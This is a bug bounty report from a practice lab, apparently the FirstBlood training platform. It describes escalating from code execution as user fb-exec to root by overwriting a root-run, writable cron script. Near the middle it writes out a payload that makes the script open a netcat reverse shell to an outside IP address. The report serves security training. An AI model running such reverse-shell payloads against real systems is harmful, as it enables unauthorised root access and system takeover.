FirstBlood-#806 — Privilege escalation when having root
This issue was discovered on FirstBlood v2
On 2021-10-28, twsec Level 2 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
from deserialization , we can get an RCE, but we're not root on the machine , this report explains how i was able to
explain how i did that.
- with the rce i'm the user fb-exec
made a few google search on linux priv escalation cheat sheet , and they talk about cron jobs
so we try to find what kind of cronjobs we have
2.list the cron jobs
firstblood and php are of interest
we cat firstblood and find the following:
php scheduler.php is of interest now we need to find scheduler.php
ls -al to see the permission on this file:
and we see write access, but first lets see it's contents
this file belongs to root but fb-exec can write on it so we prepare our payload
printf "<?php system('nc 52.14.6.200 6789 -e /bin/sh'); ?>" > /app/firstblood/scheduler.php
this command overwrites the scheduler.php
and this is what it contains now
now on our server we have to listen on that port and wait.
once we get our connection, we check who we are and we're root
P1 CRITICAL
Endpoint: api/checkproof.php
Parameter: proof
Payload: phar file
FirstBlood ID: 35
Vulnerability Type: RCE
A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.